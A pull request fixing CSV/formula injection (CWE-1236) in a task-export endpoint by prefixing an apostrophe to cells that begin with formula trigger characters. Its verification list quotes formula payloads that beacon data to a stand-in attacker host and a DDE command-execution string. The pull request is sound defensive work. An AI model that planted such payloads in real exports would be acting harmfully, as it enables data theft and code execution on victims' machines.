### PR TITLE
fix(security): neutralise CSV/formula injection in task export (CWE-1236) (Closes #67)

### DIFF
--- a/backend_mern/controllers/taskController.js
+++ b/backend_mern/controllers/taskController.js
@@ -19,13 +19,28 @@ const MAX_LIMIT = 50;
 
 const validateObjectId = (id) => mongoose.Types.ObjectId.isValid(id);
 
+// Characters that spreadsheet applications (Excel, Google Sheets, LibreOffice
+// Calc) interpret as the start of a formula when they are the first character
+// of a cell. A leading TAB or CR also triggers evaluation in some apps.
+const CSV_FORMULA_TRIGGERS = new Set(["=", "+", "-", "@", "\t", "\r"]);
+
 const csvEscape = (value) => {
   if (value === null || value === undefined) return "";
 
-  const stringValue =
+  let stringValue =
     value instanceof Date
       ? value.toISOString()
       : String(value).replace(/\r?\n/g, " ");
+
+  // CSV / formula injection guard (CWE-1236, OWASP "CSV Injection").
+  // Spreadsheet apps strip the surrounding CSV quotes on parse and then
+  // evaluate any cell whose first character is = + - @ TAB or CR as a formula.
+  // Prefixing a single quote marks the cell as literal text: the apostrophe is
+  // not displayed and the underlying value is unchanged, but the formula engine
+  // no longer executes it.
+  if (stringValue.length > 0 && CSV_FORMULA_TRIGGERS.has(stringValue[0])) {
+    stringValue = `'${stringValue}`;
+  }
 
   return `"${stringValue.replace(/"/g, '""')}"`;
 };


### PR DESCRIPTION
Closes #67

## Summary

The task export endpoint **`GET /api/tasks/my/export`** (handler
`exportMyTasks`) was vulnerable to CSV / formula injection (CWE-1236, OWASP
"CSV Injection"). Task titles and descriptions are free-text fields, and any
user who can title a task — including an **admin creating and assigning a task
to another user** — could embed a spreadsheet formula that executes when the
victim downloads and opens their exported task list in Excel, Google Sheets, or
LibreOffice Calc. The victim does not need to interact with the cell; opening
the file is enough in most configurations.

This is a genuine cross-user vector, not a self-contained issue, because of the
existing assignment flow (`PATCH /api/tasks/:id/assign`): the attacker controls
the task title, a different user is the one who exports and opens it.

## Root cause

The CSV is assembled by `buildTasksCsv`, which routes every field through the
`csvEscape` helper. Before this change:

```js
const csvEscape = (value) => {
  if (value === null || value === undefined) return "";
  const stringValue =
    value instanceof Date
      ? value.toISOString()
      : String(value).replace(/\r?\n/g, " ");
  return `"${stringValue.replace(/"/g, '""')}"`;
};
```

This wraps every cell in double quotes and doubles any internal quotes. That
correctly prevents the value from **breaking out of its CSV cell** (row/column
injection) — but it does nothing to stop **formula execution**.

The misconception this addresses: people assume that because `"=1+1"` is quoted,
the spreadsheet treats it as text. It does not. The CSV parser removes the outer
quotes as part of parsing and hands `=1+1` to the formula engine, which then
evaluates it. The quotes are a transport mechanism, not a formula guard.
Spreadsheet apps evaluate any cell whose **first character** is `=`, `+`, `-`,
`@`, TAB (`\t`), or CR (`\r`).

## Fix

A single guard is added inside `csvEscape`, before the existing quote-wrapping:

```js
const CSV_FORMULA_TRIGGERS = new Set(["=", "+", "-", "@", "\t", "\r"]);

const csvEscape = (value) => {
  if (value === null || value === undefined) return "";

  let stringValue =
    value instanceof Date
      ? value.toISOString()
      : String(value).replace(/\r?\n/g, " ");

  // CSV / formula injection guard (CWE-1236, OWASP "CSV Injection").
  if (stringValue.length > 0 && CSV_FORMULA_TRIGGERS.has(stringValue[0])) {
    stringValue = `'${stringValue}`;
  }

  return `"${stringValue.replace(/"/g, '""')}"`;
};
```

When a cell value begins with a trigger character, a single quote (`'`) is
prepended. The leading apostrophe is the standard, spreadsheet-recognised marker
that a cell is **literal text** — it is not rendered in the cell, and it does not
alter the underlying data semantically. The formula engine no longer evaluates
the value.

The change is intentionally minimal:
- Only `csvEscape` is modified (plus the new `CSV_FORMULA_TRIGGERS` constant
  directly above it). No new dependencies, no signature change, no change to
  `buildTasksCsv`, `exportMyTasks`, or any other function.
- `const stringValue` became `let stringValue` only so the guard can reassign it.

## Why there are no false positives on legitimate data

`buildTasksCsv` passes six columns through `csvEscape`:

| Column | User-controlled? | Can trigger? | Why |
|---|---|---|---|
| Task title | Yes (free text) | Yes | Injection surface — now guarded |
| Description | Yes (free text) | Yes | Injection surface — now guarded |
| Status | No | No | Enum: `todo` / `in-progress` / `done` |
| Priority | No | No | Enum: `low` / `medium` / `high` |
| Due Date | No | No | `formatDateForCsv` output always starts with a digit |
| Created Date | No | No | Same — ISO date, starts with a digit |

So the only cells that can ever receive the apostrophe are the two free-text
fields that are the actual attack surface. Legitimate titles like `Buy milk`,
`Fix login bug`, or `Review PR #65` are emitted byte-for-byte as before.

## Verification (26/26)

A standalone reproduction of the patched `csvEscape` was run against crafted
inputs:

**Neutralised — leading apostrophe applied (8):**
`=HYPERLINK("https://attacker/?d="&A1,"x")`, `+1+1`, `-2+3`, `@SUM(A1:A9)`,
`=cmd|'/c calc'!A0`, `=IMPORTDATA("https://attacker/beacon")`, a value starting
with TAB, and a value starting with CR. Each now renders as text rather than
executing.

**Unchanged — no spurious prefixing (9):**
`Buy milk`, `Fix login bug`, `Q3 report`, `2026-06-07`, `Review PR #65`, `todo`,
`low`, `high`, `in-progress`.

**Structural guarantees preserved (9):**
- `null` → `""`, `undefined` → `""`, empty string → `""`
- internal quotes doubled: `say "hi"` → `"say ""hi"""`
- `\n` → space, `\r\n` → single space
- `Date` → ISO string (`2026-06-08T10:00:00.000Z`) — starts with a digit, so no
  false trigger
- combined case `=A1&"x"` → both prefixed **and** quote-doubled (`"'=A1&""x"""`)
- mid-string `=` (`a=b`) left untouched — only the **first** character matters

**Tooling:**
- `node --check` passes on the full 639-line module.
- Diff against `main` confirms the change is confined to the `csvEscape` region;
  all 12 exports and every other function are byte-for-byte unchanged.

## Notes

This file is also touched by my open PRs #65 (`getTask` populate) and #68
(`addComment` / assignment) — both edit different functions, so this merges
cleanly regardless of order.

## References
OWASP CSV Injection · CWE-1236 · CVE-2014-3704 (precedent)